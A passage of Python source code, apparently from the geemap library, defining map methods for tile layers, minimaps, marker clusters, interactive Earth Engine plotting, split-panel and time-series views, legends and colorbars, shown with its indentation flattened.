tile = get_cog_mosaic(
links,
titiler_endpoint=titiler_endpoint,
username=username,
layername=layername,
overwrite=overwrite,
verbose=verbose,
)
self.add_tile_layer(tile, name, attribution, opacity, shown)
if show_footprints:
if verbose:
print(
f"Generating footprints of {len(links)} COGs. This might take a while ..."
)
coords = []
for link in links:
coord = get_cog_bounds(link)
if coord is not None:
coords.append(coord)
fc = coords_to_geojson(coords)
geo_json = ipyleaflet.GeoJSON(
data=fc,
style={
"opacity": 1,
"dashArray": "1",
"fillOpacity": 0,
"weight": 1,
},
name="Footprints",
)
self.add_layer(geo_json)
center = get_center(fc)
if verbose:
print("The footprint layer has been added.")
else:
center = get_cog_center(links[0], titiler_endpoint)
self.set_center(center[0], center[1], zoom=6)
def add_stac_layer(
self,
url,
bands=None,
name="Untitled",
attribution="",
opacity=1.0,
shown=True,
titiler_endpoint="https://api.cogeo.xyz/",
**kwargs,
):
"""Adds a STAC TileLayer to the map.
Args:
url (str): The URL of the COG tile layer.
name (str, optional): The layer name to use for the layer. Defaults to 'Untitled'.
attribution (str, optional): The attribution to use. Defaults to ''.
opacity (float, optional): The opacity of the layer. Defaults to 1.
shown (bool, optional): A flag indicating whether the layer should be on by default. Defaults to True.
titiler_endpoint (str, optional): Titiler endpoint. Defaults to "https://api.cogeo.xyz/".
"""
tile_url = get_stac_tile(url, bands, titiler_endpoint, **kwargs)
center = get_stac_center(url, titiler_endpoint)
self.add_tile_layer(tile_url, name, attribution, opacity, shown)
self.set_center(lon=center[0], lat=center[1], zoom=10)
def add_minimap(self, zoom=5, position="bottomright"):
"""Adds a minimap (overview) to the ipyleaflet map.
Args:
zoom (int, optional): Initial map zoom level. Defaults to 5.
position (str, optional): Position of the minimap. Defaults to "bottomright".
"""
minimap = ipyleaflet.Map(
zoom_control=False,
attribution_control=False,
zoom=zoom,
center=self.center,
layers=[basemap_tiles["ROADMAP"]],
)
minimap.layout.width = "150px"
minimap.layout.height = "150px"
ipyleaflet.link((minimap, "center"), (self, "center"))
minimap_control = ipyleaflet.WidgetControl(widget=minimap, position=position)
self.add_control(minimap_control)
def marker_cluster(self):
"""Adds a marker cluster to the map and returns a list of ee.Feature, which can be accessed using Map.ee_marker_cluster.
Returns:
object: a list of ee.Feature
"""
coordinates = []
markers = []
marker_cluster = ipyleaflet.MarkerCluster(name="Marker Cluster")
self.last_click = []
self.all_clicks = []
self.ee_markers = []
self.add_layer(marker_cluster)
def handle_interaction(**kwargs):
latlon = kwargs.get("coordinates")
if kwargs.get("type") == "click":
coordinates.append(latlon)
geom = ee.Geometry.Point(latlon[1], latlon[0])
feature = ee.Feature(geom)
self.ee_markers.append(feature)
self.last_click = latlon
self.all_clicks = coordinates
markers.append(ipyleaflet.Marker(location=latlon))
marker_cluster.markers = markers
elif kwargs.get("type") == "mousemove":
pass
# cursor style: https://www.w3schools.com/cssref/pr_class_cursor.asp
self.default_style = {"cursor": "crosshair"}
self.on_interaction(handle_interaction)
def set_plot_options(
self,
add_marker_cluster=False,
sample_scale=None,
plot_type=None,
overlay=False,
position="bottomright",
min_width=None,
max_width=None,
min_height=None,
max_height=None,
**kwargs,
):
"""Sets plotting options.
Args:
add_marker_cluster (bool, optional): Whether to add a marker cluster. Defaults to False.
sample_scale (float, optional): A nominal scale in meters of the projection to sample in. Defaults to None.
plot_type (str, optional): The plot type can be one of "None", "bar", "scatter" or "hist". Defaults to None.
overlay (bool, optional): Whether to overlay plotted lines on the figure. Defaults to False.
position (str, optional): Position of the control, can be ‘bottomleft’, ‘bottomright’, ‘topleft’, or ‘topright’. Defaults to 'bottomright'.
min_width (int, optional): Min width of the widget (in pixels), if None it will respect the content size. Defaults to None.
max_width (int, optional): Max width of the widget (in pixels), if None it will respect the content size. Defaults to None.
min_height (int, optional): Min height of the widget (in pixels), if None it will respect the content size. Defaults to None.
max_height (int, optional): Max height of the widget (in pixels), if None it will respect the content size. Defaults to None.
"""
plot_options_dict = {}
plot_options_dict["add_marker_cluster"] = add_marker_cluster
plot_options_dict["sample_scale"] = sample_scale
plot_options_dict["plot_type"] = plot_type
plot_options_dict["overlay"] = overlay
plot_options_dict["position"] = position
plot_options_dict["min_width"] = min_width
plot_options_dict["max_width"] = max_width
plot_options_dict["min_height"] = min_height
plot_options_dict["max_height"] = max_height
for key in kwargs.keys():
plot_options_dict[key] = kwargs[key]
self.plot_options = plot_options_dict
if add_marker_cluster and (self.plot_marker_cluster not in self.layers):
self.add_layer(self.plot_marker_cluster)
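# Example (illustrative values): request bar charts sampled at 30 m and cluster
# the clicked locations with markers.
#   m.set_plot_options(add_marker_cluster=True, sample_scale=30, plot_type="bar")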
def plot(
self,
x,
y,
plot_type=None,
overlay=False,
position="bottomright",
min_width=None,
max_width=None,
min_height=None,
max_height=None,
**kwargs,
):
"""Creates a plot based on x-array and y-array data.
Args:
x (numpy.ndarray or list): The x-coordinates of the plotted line.
y (numpy.ndarray or list): The y-coordinates of the plotted line.
plot_type (str, optional): The plot type can be one of "None", "bar", "scatter" or "hist". Defaults to None.
overlay (bool, optional): Whether to overlay plotted lines on the figure. Defaults to False.
position (str, optional): Position of the control, can be ‘bottomleft’, ‘bottomright’, ‘topleft’, or ‘topright’. Defaults to 'bottomright'.
min_width (int, optional): Min width of the widget (in pixels), if None it will respect the content size. Defaults to None.
max_width (int, optional): Max width of the widget (in pixels), if None it will respect the content size. Defaults to None.
min_height (int, optional): Min height of the widget (in pixels), if None it will respect the content size. Defaults to None.
max_height (int, optional): Max height of the widget (in pixels), if None it will respect the content size. Defaults to None.
"""
if self.plot_widget is not None:
plot_widget = self.plot_widget
else:
plot_widget = widgets.Output(layout={"border": "1px solid black"})
plot_control = ipyleaflet.WidgetControl(
widget=plot_widget,
position=position,
min_width=min_width,
max_width=max_width,
min_height=min_height,
max_height=max_height,
)
self.plot_widget = plot_widget
self.plot_control = plot_control
self.add_control(plot_control)
if max_width is None:
max_width = 500
if max_height is None:
max_height = 300
if (plot_type is None) and ("markers" not in kwargs.keys()):
kwargs["markers"] = "circle"
with plot_widget:
try:
fig = plt.figure(1, **kwargs)
if max_width is not None:
fig.layout.width = str(max_width) + "px"
if max_height is not None:
fig.layout.height = str(max_height) + "px"
plot_widget.clear_output(wait=True)
if not overlay:
plt.clear()
if plot_type is None:
if "marker" not in kwargs.keys():
kwargs["marker"] = "circle"
plt.plot(x, y, **kwargs)
elif plot_type == "bar":
plt.bar(x, y, **kwargs)
elif plot_type == "scatter":
plt.scatter(x, y, **kwargs)
elif plot_type == "hist":
plt.hist(y, **kwargs)
plt.show()
except Exception as e:
print("Failed to create plot.")
raise Exception(e)
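# Illustrative usage sketch for plot(); the x/y values are made-up sample data:
#
#     import numpy as np
#     m = Map()
#     x = np.arange(10)
#     y = np.random.rand(10)
#     m.plot(x, y, plot_type="scatter", max_width=400, max_height=250)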
def plot_demo(
self,
iterations=20,
plot_type=None,
overlay=False,
position="bottomright",
min_width=None,
max_width=None,
min_height=None,
max_height=None,
**kwargs,
):
"""A demo of interactive plotting using random pixel coordinates.
Args:
iterations (int, optional): How many iterations to run for the demo. Defaults to 20.
plot_type (str, optional): The plot type can be one of "None", "bar", "scatter" or "hist". Defaults to None.
overlay (bool, optional): Whether to overlay plotted lines on the figure. Defaults to False.
position (str, optional): Position of the control, can be ‘bottomleft’, ‘bottomright’, ‘topleft’, or ‘topright’. Defaults to 'bottomright'.
min_width (int, optional): Min width of the widget (in pixels), if None it will respect the content size. Defaults to None.
max_width (int, optional): Max width of the widget (in pixels), if None it will respect the content size. Defaults to None.
min_height (int, optional): Min height of the widget (in pixels), if None it will respect the content size. Defaults to None.
max_height (int, optional): Max height of the widget (in pixels), if None it will respect the content size. Defaults to None.
"""
import numpy as np
if self.random_marker is not None:
self.remove_layer(self.random_marker)
image = ee.Image("LE7_TOA_5YEAR/1999_2003").select([0, 1, 2, 3, 4, 6])
self.addLayer(
image,
{"bands": ["B4", "B3", "B2"], "gamma": 1.4},
"LE7_TOA_5YEAR/1999_2003",
)
self.setCenter(-50.078877, 25.190030, 3)
band_names = image.bandNames().getInfo()
# band_count = len(band_names)
latitudes = np.random.uniform(30, 48, size=iterations)
longitudes = np.random.uniform(-121, -76, size=iterations)
marker = ipyleaflet.Marker(location=(0, 0))
self.random_marker = marker
self.add_layer(marker)
for i in range(iterations):
try:
coordinate = ee.Geometry.Point([longitudes[i], latitudes[i]])
dict_values = image.sample(coordinate).first().toDictionary().getInfo()
band_values = list(dict_values.values())
title = "{}/{}: Spectral signature at ({}, {})".format(
i + 1,
iterations,
round(latitudes[i], 2),
round(longitudes[i], 2),
)
marker.location = (latitudes[i], longitudes[i])
self.plot(
band_names,
band_values,
plot_type=plot_type,
overlay=overlay,
min_width=min_width,
max_width=max_width,
min_height=min_height,
max_height=max_height,
title=title,
**kwargs,
)
time.sleep(0.3)
except Exception as e:
raise Exception(e)
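# Illustrative usage sketch (requires an authenticated Earth Engine session,
# since the demo samples LE7_TOA_5YEAR/1999_2003 at random points):
#
#     m = Map()
#     m.plot_demo(iterations=5, plot_type="bar")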
def plot_raster(
self,
ee_object=None,
sample_scale=None,
plot_type=None,
overlay=False,
position="bottomright",
min_width=None,
max_width=None,
min_height=None,
max_height=None,
**kwargs,
):
"""Interactive plotting of Earth Engine data by clicking on the map.
Args:
ee_object (object, optional): The ee.Image or ee.ImageCollection to sample. Defaults to None.
sample_scale (float, optional): A nominal scale in meters of the projection to sample in. Defaults to None.
plot_type (str, optional): The plot type can be one of "None", "bar", "scatter" or "hist". Defaults to None.
overlay (bool, optional): Whether to overlay plotted lines on the figure. Defaults to False.
position (str, optional): Position of the control, can be ‘bottomleft’, ‘bottomright’, ‘topleft’, or ‘topright’. Defaults to 'bottomright'.
min_width (int, optional): Min width of the widget (in pixels), if None it will respect the content size. Defaults to None.
max_width (int, optional): Max width of the widget (in pixels), if None it will respect the content size. Defaults to None.
min_height (int, optional): Min height of the widget (in pixels), if None it will respect the content size. Defaults to None.
max_height (int, optional): Max height of the widget (in pixels), if None it will respect the content size. Defaults to None.
"""
if self.plot_control is not None:
del self.plot_widget
if self.plot_control in self.controls:
self.remove_control(self.plot_control)
if self.random_marker is not None:
self.remove_layer(self.random_marker)
plot_widget = widgets.Output(layout={"border": "1px solid black"})
plot_control = ipyleaflet.WidgetControl(
widget=plot_widget,
position=position,
min_width=min_width,
max_width=max_width,
min_height=min_height,
max_height=max_height,
)
self.plot_widget = plot_widget
self.plot_control = plot_control
self.add_control(plot_control)
self.default_style = {"cursor": "crosshair"}
msg = "The plot function can only be used on ee.Image or ee.ImageCollection with more than one band."
if (ee_object is None) and len(self.ee_raster_layers) > 0:
ee_object = self.ee_raster_layers[-1]
if isinstance(ee_object, ee.ImageCollection):
ee_object = ee_object.mosaic()
elif isinstance(ee_object, ee.ImageCollection):
ee_object = ee_object.mosaic()
elif not isinstance(ee_object, ee.Image):
print(msg)
return
if sample_scale is None:
sample_scale = self.getScale()
if max_width is None:
max_width = 500
band_names = ee_object.bandNames().getInfo()
coordinates = []
markers = []
marker_cluster = ipyleaflet.MarkerCluster(name="Marker Cluster")
self.last_click = []
self.all_clicks = []
self.add_layer(marker_cluster)
def handle_interaction(**kwargs2):
latlon = kwargs2.get("coordinates")
if kwargs2.get("type") == "click":
try:
coordinates.append(latlon)
self.last_click = latlon
self.all_clicks = coordinates
markers.append(ipyleaflet.Marker(location=latlon))
marker_cluster.markers = markers
self.default_style = {"cursor": "wait"}
xy = ee.Geometry.Point(latlon[::-1])
dict_values = (
ee_object.sample(xy, scale=sample_scale)
.first()
.toDictionary()
.getInfo()
)
band_values = list(dict_values.values())
self.plot(
band_names,
band_values,
plot_type=plot_type,
overlay=overlay,
min_width=min_width,
max_width=max_width,
min_height=min_height,
max_height=max_height,
**kwargs,
)
self.default_style = {"cursor": "crosshair"}
except Exception as e:
if self.plot_widget is not None:
with self.plot_widget:
self.plot_widget.clear_output()
print("No data for the clicked location.")
else:
print(e)
self.default_style = {"cursor": "crosshair"}
self.on_interaction(handle_interaction)
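# Illustrative usage sketch: enable click-to-plot for a Landsat composite.
# The asset ID, bands, and scale below are examples, not requirements:
#
#     image = ee.Image("LE7_TOA_5YEAR/1999_2003")
#     m = Map()
#     m.addLayer(image, {"bands": ["B4", "B3", "B2"]}, "Landsat composite")
#     m.plot_raster(ee_object=image, sample_scale=30, plot_type="bar")
#     # Clicking the map now samples every band at the clicked point and plots it.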
def add_maker_cluster(self, event="click", add_marker=True):
"""Captures user inputs and add markers to the map.
Args:
event (str, optional): [description]. Defaults to 'click'.
add_marker (bool, optional): If True, add markers to the map. Defaults to True.
Returns:
object: a marker cluster.
"""
coordinates = []
markers = []
marker_cluster = ipyleaflet.MarkerCluster(name="Marker Cluster")
self.last_click = []
self.all_clicks = []
if add_marker:
self.add_layer(marker_cluster)
def handle_interaction(**kwargs):
latlon = kwargs.get("coordinates")
if event == "click" and kwargs.get("type") == "click":
coordinates.append(latlon)
self.last_click = latlon
self.all_clicks = coordinates
if add_marker:
markers.append(ipyleaflet.Marker(location=latlon))
marker_cluster.markers = markers
elif kwargs.get("type") == "mousemove":
pass
# cursor style: https://www.w3schools.com/cssref/pr_class_cursor.asp
self.default_style = {"cursor": "crosshair"}
self.on_interaction(handle_interaction)
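# Illustrative usage sketch: collect clicked coordinates as markers.
#
#     m = Map()
#     m.add_maker_cluster(event="click", add_marker=True)
#     # After a few clicks:
#     #   m.last_click  -> the most recent (lat, lon)
#     #   m.all_clicks  -> list of all clicked coordinates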
def set_control_visibility(
self, layerControl=True, fullscreenControl=True, latLngPopup=True
):
"""Sets the visibility of the controls on the map.
Args:
layerControl (bool, optional): Whether to show the control that allows the user to toggle layers on/off. Defaults to True.
fullscreenControl (bool, optional): Whether to show the control that allows the user to make the map full-screen. Defaults to True.
latLngPopup (bool, optional): Whether to show the control that pops up the Lat/lon when the user clicks on the map. Defaults to True.
"""
pass
setControlVisibility = set_control_visibility
def add_layer_control(self):
"""Adds the layer control to the map."""
pass
addLayerControl = add_layer_control
def split_map(self, left_layer="HYBRID", right_layer="ESRI"):
"""Adds split map.
Args:
left_layer (str, optional): The left tile layer. Defaults to 'HYBRID'.
right_layer (str, optional): The right tile layer. Defaults to 'ESRI'.
"""
try:
controls = self.controls
layers = self.layers
self.clear_controls()
self.add_control(ipyleaflet.ZoomControl())
self.add_control(ipyleaflet.FullScreenControl())
if left_layer in basemap_tiles.keys():
left_layer = basemap_tiles[left_layer]
if right_layer in basemap_tiles.keys():
right_layer = basemap_tiles[right_layer]
control = ipyleaflet.SplitMapControl(
left_layer=left_layer, right_layer=right_layer
)
close_button = widgets.ToggleButton(
value=False,
tooltip="Close split-panel map",
icon="times",
layout=widgets.Layout(
height="28px", width="28px", padding="0px 0px 0px 4px"
),
)
def close_btn_click(change):
if change["new"]:
self.controls = controls
self.layers = layers[:-1]
self.add_layer(layers[-1])
close_button.observe(close_btn_click, "value")
close_control = ipyleaflet.WidgetControl(
widget=close_button, position="bottomright"
)
self.add_control(control)
self.add_control(close_control)
except Exception as e:
print("The provided layers are invalid!")
raise ValueError(e)
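# Illustrative usage sketch: compare two basemaps side by side. "HYBRID" and
# "ESRI" are the defaults from the signature; any key of basemap_tiles or an
# ipyleaflet TileLayer should work as well:
#
#     m = Map()
#     m.split_map(left_layer="HYBRID", right_layer="ESRI")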
def ts_inspector(
self,
left_ts,
right_ts,
left_names,
right_names,
left_vis={},
right_vis={},
):
"""Creates a split-panel map for inspecting timeseries images.
Args:
left_ts (object): An ee.ImageCollection to show on the left panel.
right_ts (object): An ee.ImageCollection to show on the right panel.
left_names (list): A list of names to show under the left dropdown.
right_names (list): A list of names to show under the right dropdown.
left_vis (dict, optional): Visualization parameters for the left layer. Defaults to {}.
right_vis (dict, optional): Visualization parameters for the right layer. Defaults to {}.
"""
left_count = int(left_ts.size().getInfo())
right_count = int(right_ts.size().getInfo())
if left_count != len(left_names):
print(
"The number of images in left_ts must match the number of layer names in left_names."
)
return
if right_count != len(right_names):
print(
"The number of images in right_ts must match the number of layer names in right_names."
)
return
left_layer = ipyleaflet.TileLayer(
url="https://mt1.google.com/vt/lyrs=m&x={x}&y={y}&z={z}",
attribution="Google",
name="Google Maps",
)
right_layer = ipyleaflet.TileLayer(
url="https://mt1.google.com/vt/lyrs=m&x={x}&y={y}&z={z}",
attribution="Google",
name="Google Maps",
)
self.clear_controls()
left_dropdown = widgets.Dropdown(options=left_names, value=None)
right_dropdown = widgets.Dropdown(options=right_names, value=None)
left_dropdown.layout.max_width = "130px"
right_dropdown.layout.max_width = "130px"
left_control = ipyleaflet.WidgetControl(
widget=left_dropdown, position="topleft"
)
right_control = ipyleaflet.WidgetControl(
widget=right_dropdown, position="topright"
)
self.add_control(control=left_control)
self.add_control(control=right_control)
self.add_control(ipyleaflet.ZoomControl(position="topleft"))
self.add_control(ipyleaflet.ScaleControl(position="bottomleft"))
self.add_control(ipyleaflet.FullScreenControl())
def left_dropdown_change(change):
left_dropdown_index = left_dropdown.index
if left_dropdown_index is not None and left_dropdown_index >= 0:
try:
if isinstance(left_ts, ee.ImageCollection):
left_image = left_ts.toList(left_ts.size()).get(
left_dropdown_index
)
elif isinstance(left_ts, ee.List):
left_image = left_ts.get(left_dropdown_index)
else:
print("The left_ts argument must be an ImageCollection.")
return
if isinstance(left_image, ee.ImageCollection):
left_image = ee.Image(left_image.mosaic())
elif isinstance(left_image, ee.Image):
pass
else:
left_image = ee.Image(left_image)
left_image = ee_tile_layer(
left_image, left_vis, left_names[left_dropdown_index]
)
left_layer.url = left_image.url
except Exception as e:
print(e)
return
left_dropdown.observe(left_dropdown_change, names="value")
def right_dropdown_change(change):
right_dropdown_index = right_dropdown.index
if right_dropdown_index is not None and right_dropdown_index >= 0:
try:
if isinstance(right_ts, ee.ImageCollection):
right_image = right_ts.toList(right_ts.size()).get(
right_dropdown_index
)
elif isinstance(right_ts, ee.List):
right_image = right_ts.get(right_dropdown_index)
else:
print("The left_ts argument must be an ImageCollection.")
return
if isinstance(right_image, ee.ImageCollection):
right_image = ee.Image(right_image.mosaic())
elif isinstance(right_image, ee.Image):
pass
else:
right_image = ee.Image(right_image)
right_image = ee_tile_layer(
right_image,
right_vis,
right_names[right_dropdown_index],
)
right_layer.url = right_image.url
except Exception as e:
print(e)
return
right_dropdown.observe(right_dropdown_change, names="value")
try:
split_control = ipyleaflet.SplitMapControl(
left_layer=left_layer, right_layer=right_layer
)
self.add_control(split_control)
except Exception as e:
raise Exception(e)
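# Illustrative usage sketch; left_ts/right_ts are placeholder ee.ImageCollection
# objects, and each must contain exactly as many images as the matching name list:
#
#     m = Map()
#     m.ts_inspector(
#         left_ts, right_ts,
#         left_names=["2001", "2006"], right_names=["2001", "2006"],
#         left_vis={"bands": ["B4", "B3", "B2"]},
#         right_vis={"bands": ["B4", "B3", "B2"]},
#     )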
def basemap_demo(self):
"""A demo for using geemap basemaps."""
dropdown = widgets.Dropdown(
options=list(basemap_tiles.keys()),
value="HYBRID",
description="Basemaps",
)
def on_click(change):
basemap_name = change["new"]
old_basemap = self.layers[-1]
self.substitute_layer(old_basemap, basemap_tiles[basemap_name])
dropdown.observe(on_click, "value")
basemap_control = ipyleaflet.WidgetControl(widget=dropdown, position="topright")
self.add_control(basemap_control)
def add_legend(
self,
legend_title="Legend",
legend_dict=None,
legend_keys=None,
legend_colors=None,
position="bottomright",
builtin_legend=None,
layer_name=None,
**kwargs,
):
"""Adds a customized basemap to the map.
Args:
legend_title (str, optional): Title of the legend. Defaults to 'Legend'.
legend_dict (dict, optional): A dictionary containing legend items as keys and color as values. If provided, legend_keys and legend_colors will be ignored. Defaults to None.
legend_keys (list, optional): A list of legend keys. Defaults to None.
legend_colors (list, optional): A list of legend colors. Defaults to None.
position (str, optional): Position of the legend. Defaults to 'bottomright'.
builtin_legend (str, optional): Name of the builtin legend to add to the map. Defaults to None.
layer_name (str, optional): Layer name of the legend to be associated with. Defaults to None.
"""
import pkg_resources
from IPython.display import display
pkg_dir = os.path.dirname(
pkg_resources.resource_filename("geemap", "geemap.py")
)
legend_template = os.path.join(pkg_dir, "data/template/legend.html")
if "min_width" not in kwargs.keys():
min_width = None
if "max_width" not in kwargs.keys():
max_width = None
else:
max_width = kwargs["max_width"]
if "min_height" not in kwargs.keys():
min_height = None
else:
min_height = kwargs["min_height"]
if "max_height" not in kwargs.keys():
max_height = None
else:
max_height = kwargs["max_height"]
if "height" not in kwargs.keys():
height = None
else:
height = kwargs["height"]
if "width" not in kwargs.keys():
width = None
else:
width = kwargs["width"]
if width is None:
max_width = "300px"
if height is None:
max_height = "400px"
if not os.path.exists(legend_template):
print("The legend template does not exist.")
return
if legend_keys is not None:
if not isinstance(legend_keys, list):
print("The legend keys must be a list.")
return
else:
legend_keys = ["One", "Two", "Three", "Four", "etc"]
if legend_colors is not None:
if not isinstance(legend_colors, list):
print("The legend colors must be a list.")
return
elif all(isinstance(item, tuple) for item in legend_colors):
try:
legend_colors = [rgb_to_hex(x) for x in legend_colors]
except Exception as e:
print(e)
elif all(
(item.startswith("#") and len(item) == 7) for item in legend_colors
):
pass
elif all((len(item) == 6) for item in legend_colors):
pass
else:
print("The legend colors must be a list of tuples.")
return
else:
legend_colors = [
"#8DD3C7",
"#FFFFB3",
"#BEBADA",
"#FB8072",
"#80B1D3",
]
if len(legend_keys) != len(legend_colors):
print("The legend keys and values must be the same length.")
return
allowed_builtin_legends = builtin_legends.keys()
if builtin_legend is not None:
if builtin_legend not in allowed_builtin_legends:
print(
"The builtin legend must be one of the following: {}".format(
", ".join(allowed_builtin_legends)
)
)
return
else:
legend_dict = builtin_legends[builtin_legend]
legend_keys = list(legend_dict.keys())
legend_colors = list(legend_dict.values())
if legend_dict is not None:
if not isinstance(legend_dict, dict):
print("The legend dict must be a dictionary.")
return
else:
legend_keys = list(legend_dict.keys())
legend_colors = list(legend_dict.values())
if all(isinstance(item, tuple) for item in legend_colors):
try:
legend_colors = [rgb_to_hex(x) for x in legend_colors]
except Exception as e:
print(e)
allowed_positions = [
"topleft",
"topright",
"bottomleft",
"bottomright",
]
if position not in allowed_positions:
print(
"The position must be one of the following: {}".format(
", ".join(allowed_positions)
)
)
return
header = []
content = []
footer = []
with open(legend_template) as f:
lines = f.readlines()
lines[3] = lines[3].replace("Legend", legend_title)
header = lines[:6]
footer = lines[11:]
for index, key in enumerate(legend_keys):
color = legend_colors[index]
if not color.startswith("#"):
color = "#" + color
item = " <li><span style='background:{};'></span>{}</li>\n".format(
color, key
)
content.append(item)
legend_html = header + content + footer
legend_text = "".join(legend_html)
try:
legend_output_widget = widgets.Output(
layout={
# "border": "1px solid black",
"max_width": max_width,
"min_width": min_width,
"max_height": max_height,
"min_height": min_height,
"height": height,
"width": width,
"overflow": "scroll",
}
)
legend_control = ipyleaflet.WidgetControl(
widget=legend_output_widget, position=position
)
legend_widget = widgets.HTML(value=legend_text)
with legend_output_widget:
display(legend_widget)
self.legend_widget = legend_output_widget
self.legend_control = legend_control
self.add_control(legend_control)
if layer_name in self.ee_layer_names:
self.ee_layer_dict[layer_name]["legend"] = legend_control
except Exception as e:
raise Exception(e)
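# Illustrative usage sketch; the legend entries and colors are arbitrary examples:
#
#     m = Map()
#     m.add_legend(
#         legend_title="Land cover",
#         legend_dict={"Forest": "228B22", "Water": "0000FF", "Urban": "808080"},
#         position="bottomright",
#     )
#     # Or, if "NLCD" is among the packaged builtin_legends:
#     # m.add_legend(builtin_legend="NLCD")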
def add_colorbar(
self,
vis_params=None,
cmap="gray",
discrete=False,
label=None,
orientation="horizontal",
position="bottomright",
transparent_bg=False,
layer_name=None,
**kwargs,
):
"""Add a matplotlib colorbar to the map
Args:
vis_params (dict): Visualization parameters as a dictionary. See https://developers.google.com/earth-engine/guides/image_visualization for options.
cmap (str, optional): Matplotlib colormap. Defaults to "gray". See https://matplotlib.org/3.3.4/tutorials/colors/colormaps.html#sphx-glr-tutorials-colors-colormaps-py for options.
discrete (bool, optional): Whether to create a discrete colorbar. Defaults to False.
label (str, optional): Label for the colorbar. Defaults to None.
orientation (str, optional): Orientation of the colorbar, such as "vertical" and "horizontal". Defaults to "horizontal".
position (str, optional): Position of the colorbar on the map. It can be one of: topleft, topright, bottomleft, and bottomright. Defaults to "bottomright".
transparent_bg (bool, optional): Whether to use transparent background. Defaults to False.
layer_name (str, optional): The layer name associated with the colorbar. Defaults to None.
Raises:
TypeError: If the vis_params is not a dictionary.
ValueError: If the orientation is not either horizontal or vertical.
ValueError: If the provided min value is not scalar type.
ValueError: If the provided max value is not scalar type.
ValueError: If the provided opacity value is not scalar type.
ValueError: If cmap or palette is not provided.
"""
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
if isinstance(vis_params, list):
vis_params = {"palette": vis_params}
elif isinstance(vis_params, tuple):
vis_params = {"palette": list(vis_params)}
elif vis_params is None:
vis_params = {}
if "colors" in kwargs and isinstance(kwargs["colors"], list):
vis_params["palette"] = kwargs["colors"]
if "colors" in kwargs and isinstance(kwargs["colors"], tuple):
vis_params["palette"] = list(kwargs["colors"])
if "vmin" in kwargs:
vis_params["min"] = kwargs["vmin"]
del kwargs["vmin"]
if "vmax" in kwargs:
vis_params["max"] = kwargs["vmax"]
del kwargs["vmax"]
if "caption" in kwargs:
label = kwargs["caption"]
del kwargs["caption"]
if not isinstance(vis_params, dict):
raise TypeError("The vis_params must be a dictionary.")
if orientation not in ["horizontal", "vertical"]:
raise ValueError("The orientation must be either horizontal or vertical.")
if orientation == "horizontal":
width, height = 6.0, 0.4
else:
width, height = 0.4, 4.0
if "width" in kwargs:
width = kwargs["width"]
kwargs.pop("width")
if "height" in kwargs:
height = kwargs["height"]
kwargs.pop("height")
vis_keys = list(vis_params.keys())
if "min" in vis_params:
vmin = vis_params["min"]
if type(vmin) not in (int, float):
raise ValueError("The provided min value must be scalar type.")
else:
vmin = 0
if "max" in vis_params:
vmax = vis_params["max"]
if type(vmax) not in (int, float):
raise ValueError("The provided max value must be scalar type.")
else:
vmax = 1
if "opacity" in vis_params:
alpha = vis_params["opacity"]
if type(alpha) not in (int, float):
raise ValueError("The provided opacity value must be type scalar.")
elif "alpha" in kwargs:
alpha = kwargs["alpha"]
else:
alpha = 1
if cmap is not None:
cmap = mpl.pyplot.get_cmap(cmap)
norm = mpl.colors.Normalize(vmin=vmin, vmax=vmax)
if "palette" in vis_keys:
hexcodes = to_hex_colors(vis_params["palette"])
if discrete:
cmap = mpl.colors.ListedColormap(hexcodes)
vals = np.linspace(vmin, vmax, cmap.N + 1)
norm = mpl.colors.BoundaryNorm(vals, cmap.N)
else:
cmap = mpl.colors.LinearSegmentedColormap.from_list(
"custom", hexcodes, N=256
)
norm = mpl.colors.Normalize(vmin=vmin, vmax=vmax)
elif cmap is not None:
cmap = mpl.pyplot.get_cmap(cmap)
norm = mpl.colors.Normalize(vmin=vmin, vmax=vmax)
else:
raise ValueError(
'cmap keyword or "palette" key in vis_params must be provided.'
)
_, ax = plt.subplots(figsize=(width, height))
cb = mpl.colorbar.ColorbarBase(
ax, norm=norm, alpha=alpha, cmap=cmap, orientation=orientation, **kwargs
)
if "bands" in vis_keys:
cb.set_label(vis_params["bands"])
elif label is not None:
cb.set_label(label)
output = widgets.Output()
colormap_ctrl = ipyleaflet.WidgetControl(
widget=output,
position=position,
transparent_bg=transparent_bg,
)
with output:
output.clear_output()
plt.show()
self.colorbar = colormap_ctrl
if layer_name in self.ee_layer_names:
if "colorbar" in self.ee_layer_dict[layer_name]:
self.remove_control(self.ee_layer_dict[layer_name]["colorbar"])
self.ee_layer_dict[layer_name]["colorbar"] = colormap_ctrl
self.add_control(colormap_ctrl)
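# Illustrative usage sketch: attach a colorbar that matches a layer's vis_params.
# The DEM asset and palette are examples only:
#
#     dem = ee.Image("USGS/SRTMGL1_003")
#     vis = {"min": 0, "max": 4000, "palette": ["006633", "E5FFCC", "662A00", "D8D8D8", "F5F5F5"]}
#     m = Map()
#     m.addLayer(dem, vis, "DEM")
#     m.add_colorbar(vis_params=vis, label="Elevation (m)", layer_name="DEM")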
def add_colorbar_branca(
self,
colors,
vmin=0,
vmax=1.0,
index=None,
caption="",
categorical=False,
step=None,
height="45px",
transparent_bg=False,
position="bottomright",
layer_name=None,
**kwargs,
):
"""Add a branca colorbar to the map.
Args:
colors (list): The set of colors to be used for interpolation. Colors can be provided as: tuples of RGBA ints between 0 and 255 (e.g. (255, 255, 0) or (255, 255, 0, 255)); tuples of RGBA floats between 0. and 1. (e.g. (1., 1., 0.) or (1., 1., 0., 1.)); HTML-like hex strings (e.g. "#ffff00"); or a color name or shortcut (e.g. "y" or "yellow").
vmin (int, optional): The minimal value for the colormap. Values lower than vmin will be bound directly to colors[0]. Defaults to 0.
vmax (float, optional): The maximal value for the colormap. Values higher than vmax will be bound directly to colors[-1]. Defaults to 1.0.
index (list, optional): The values corresponding to each color. It has to be sorted and have the same length as colors. If None, a regular grid between vmin and vmax is created. Defaults to None.
caption (str, optional): The caption for the colormap. Defaults to "".
categorical (bool, optional): Whether or not to create a categorical colormap. Defaults to False.
step (int, optional): The step to split the LinearColormap into a StepColormap. Defaults to None.
height (str, optional): The height of the colormap widget. Defaults to "45px".
transparent_bg (bool, optional): Whether to use transparent background for the colormap widget. Defaults to False.
position (str, optional): The position for the colormap widget. Defaults to "bottomright".
layer_name (str, optional): Layer name of the colorbar to be associated with. Defaults to None.
"""
from box import Box
from branca.colormap import LinearColormap
output = widgets.Output()
output.layout.height = height
if "width" in kwargs.keys():
output.layout.width = kwargs["width"]
if isinstance(colors, Box):
try:
colors = list(colors["default"])
except Exception as e:
print("The provided color list is invalid.")
raise Exception(e)
if all(len(color) == 6 for color in colors):
colors = ["#" + color for color in colors]
colormap = LinearColormap(
